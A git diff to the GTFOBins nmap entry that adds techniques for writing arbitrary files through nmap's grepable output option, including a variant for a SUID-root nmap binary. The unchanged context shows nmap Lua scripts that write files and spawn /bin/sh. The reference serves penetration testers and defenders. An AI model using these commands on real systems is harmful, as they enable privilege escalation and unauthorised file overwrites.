diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index 7374564..ba93dde 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -87,6 +87,10 @@ functions:
         TF=$(mktemp)
         echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
         nmap --script=$TF
+    - description: The payload appears inside the regular nmap output.
+      code: |
+        LFILE=file_to_write
+        nmap -oG=$LFILE DATA
   file-read:
     - code: |
         TF=$(mktemp)
@@ -108,4 +112,9 @@ functions:
         TF=$(mktemp)
         echo 'os.execute("/bin/sh")' > $TF
         ./nmap --script=$TF
+  suid:
+    - description: The payload appears inside the regular nmap output.
+      code: |
+        LFILE=file_to_write
+        ./nmap -oG=$LFILE DATA
 ---